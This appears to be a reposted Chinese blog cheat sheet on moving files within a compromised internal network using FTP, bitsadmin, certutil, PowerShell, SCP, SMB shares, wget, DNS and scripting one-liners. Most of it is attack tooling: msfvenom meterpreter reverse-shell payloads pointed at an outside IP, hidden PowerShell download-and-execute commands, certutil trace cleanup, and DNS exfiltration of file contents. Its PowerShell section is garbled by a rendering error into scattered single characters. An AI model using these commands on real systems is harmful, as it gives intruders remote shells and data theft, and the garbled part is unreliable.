内网文件传输
作者:互联网
windows
01 FTP
攻击机:python快速开启ftp服务器
pip3 install pyftpdlib
Python3 -m pyftpdlib
目标机:
copy con ftp.txt
open 192.168.78.70 2121
anonymous
anonymous
get pass.txt
quit
02 Bitsadmin
BITSAdmin是一个命令行工具,您可以使用它创建下载或上载作业,并监视其进度。
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=7777 -f hta-psh > 44.hta
bitsadmin /transfer shell http://139.155.49.43/44.hta C:\windows\temp\44.hta
rundll32.exe url.dll,OpenURL 44.hta
03 Certutil
➢ 下载并执行
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=6666 -f exe > 44.exe
certutil.exe -urlcache -split -f http://139.155.49.43/44.exe & start c:\windows\temp\44.exe
➢ 清除下载缓存
certutil.exe -urlcache -split -f http://139.155.49.43/44.exe delete
缓存目录:%USERPROFILE%\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
Certutil
04 Powershell
$p = new-object system.net.webclient
KaTeX parse error: Undefined control sequence: \xxx at position 45: …xx.xx/file","c:\̲x̲x̲x̲\xx\file") powe…p=new-object system.net.webclient;
p
.
D
o
w
n
l
o
a
d
F
i
l
e
(
′
h
t
t
p
:
/
/
192.168.1.227
/
s
.
t
x
t
′
,
′
s
.
t
x
t
′
)
"
p
o
w
e
r
s
h
e
l
l
(
n
e
w
−
o
b
j
e
c
t
s
y
s
t
e
m
.
n
e
t
.
w
e
b
c
l
i
e
n
t
)
.
d
o
w
n
l
o
a
d
f
i
l
e
(
′
h
t
t
p
:
/
/
192.168.1.227
/
s
.
t
x
t
′
,
′
s
.
t
x
t
′
)
p
o
w
e
r
s
h
e
l
l
I
n
v
o
k
e
−
W
e
b
R
e
q
u
e
s
t
−
u
r
i
"
h
t
t
p
:
/
/
192.168.1.227
/
s
.
t
x
t
"
−
O
u
t
F
i
l
e
"
p.DownloadFile('http://192.168.1.227/s.txt','s.txt')" powershell (new-object system.net.webclient).downloadfile('http://192.168.1.227/s.txt','s.txt') powershell Invoke-WebRequest -uri " http://192.168.1.227/s.txt " -OutFile "
p.DownloadFile(′http://192.168.1.227/s.txt′,′s.txt′)"powershell(new−objectsystem.net.webclient).downloadfile(′http://192.168.1.227/s.txt′,′s.txt′)powershellInvoke−WebRequest−uri"http://192.168.1.227/s.txt"−OutFile"env:temp\s.php“
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=139.155.49.43 lport=8899 -f psh-reflection -o shell.ps1
powershell -windowstyle hidden -exec bypass -c “IEX (New-Object
Net.WebClient).DownloadString('http://139.155.49.43/shell.ps1’);shell.ps1”;
05 SCP
➢ SCP下载文件
scp root@192.168.78.70:/root/1.hta 1.hta
scp root@192.168.78.70:/root/linux/ -r linux/
➢ SCP上传文件
scp note3.txt root@192.168.1.227:/tmp/n.txt
scp -r password/ root@192.168.1.227:/tmp/pass/
06 Windows文件共享
➢ net use
net use k: \192.168.78.67\c$ “123123” /user:administrator
dir \192.168.78.67
linux
01 weget
wget命令用来从指定的URL下载文件
wget http://192.168.1.227/lan.hta
wget -O x.sh http://192.168.1.227/lan.hta
02 curl
curl 是用来请求 Web 服务器的命令行工具。
03 Netcat
04 SFTP
05 DNS传输数据
cat test | xxd -p -c 16 | while read line; do host $line.sau547.dnslog.cn; done
脚本语言
01 php
php -r 'file_put_contents(“lan.hta”,file_get_contents(“http://192.168.1.227/lan.hta”));’
file_put_contents — 将一个字符串写入文件
file_get_contents — 将整个文件读入一个字符串
02 Python
python2 -c “import
urllib2;u=urllib2.urlopen(‘http://192.168.1.227/lan.hta’);f=open(‘c:\temp\win.hta’,‘w’);f.write(u.read());f.close()”
python3 -c "import
urllib.request;u=urllib.request.urlopen(‘http://192.168.1.227/lan.hta’);f=open(‘c:\temp\win.hta’,‘w’);f.write(u.read().decode(‘utf-8’))
03 perl
perl -MLWP::Simple -e ‘getstore(“http://192.168.1.227/Launcher.hta”,“win.hta”)’
04 Ruby
ruby -e “require ‘net/http’;Net::HTTP.start(‘192.168.1.227’) { |http| r =
http.get(’/lan.hta’);open(’/root/rb.hta’, ‘wb’) { |file| file.write(r.body)}}”
标签:http,1.227,hta,文件传输,192.168,file,txt 来源: https://blog.csdn.net/weixin_43873557/article/details/113760777